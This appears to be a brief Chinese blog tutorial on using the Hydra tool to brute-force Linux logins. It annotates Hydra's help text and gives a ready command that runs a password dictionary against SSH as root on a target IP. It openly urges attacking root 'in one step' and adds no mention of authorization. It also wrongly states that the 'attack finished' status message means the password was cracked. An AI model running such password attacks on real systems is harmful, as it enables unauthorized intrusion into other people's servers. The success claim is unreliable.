Linux登录暴力破解工具

这个没啥好说的，就是一个暴力破解工具，主要是针对Linux的。如果知道合法的用户名更好，要是实在是不知道，那也没关系，直接暴力破解root吧，一步到位。

先看下hydra -h的显示，再慢慢解释好了。

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
server service [OPT]

Options:
-R        restore a previous aborted/crashed session
恢复中断的会话
-S        connect via SSL
通过SSL连接
-s PORT   if the service is on a different default port, define it here
如果不是默认的端口，指定端口
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-l是指需破解的用户名，-L是指需破解的用户所在的文件
-p PASS  or -P FILE try password PASS, or load several passwords from FILE
载入密码字典
-e ns     additional checks, "n" for null password, "s" try login as pass
尝试空口令或者与用户名相同的密码
-C FILE   colon seperated "login:pass" format, instead of -L/-P options
指定一个含有login:pass的文件，取代-L/-P选项
-M FILE   server list for parallel attacks, one entry per line
指定目标地址文件，一行一个地址
-o FILE   write found login/password pairs to FILE instead of stdout
将找到的密码写入文件中
-f        exit after the first found login/password pair (per host if -M)
找到密码后退出
-t TASKS  run TASKS number of connects in parallel (default: 16)
指定线程数目，默认是16
-w TIME   defines the max wait time in seconds for responses (default: 30)
响应最大等待时间30s
-v / -V   verbose mode / show login+pass combination for each attempt
详细模式
server    the target server (use either this OR the -M option)
目标ip地址
service   the service to crack. Supported protocols: telnet ftp pop3[-ntlm]   imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco  cisco-enable vnc ldap2 ldap3 mssql mysql Oracle-listener postgres nntp socks5   rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere  teamspeak sip vmauthd firebird ncp
所支持的服务
OPT       some service modules need special input (see README!)

Use HYDRA_PROXY_HTTP/HYDRA_PROXY_CONNECT and HYDRA_PROXY_AUTH env for a proxy.
Hydra is a tool to guess/crack valid login/password pairs - use allowed only
for legal purposes! If used commercially, tool name, version and web address
must be mentioned in the report. Find the newest version at

大致上就是如此了。现在来实际操作一下。
hydra -l root -P /home/Linux/passwd.dic -e ns -f -vV target_ip ssh2

当出现[STATUS] attack finished for target_ip (waiting for childs to finish) 时，表示已经破解成功。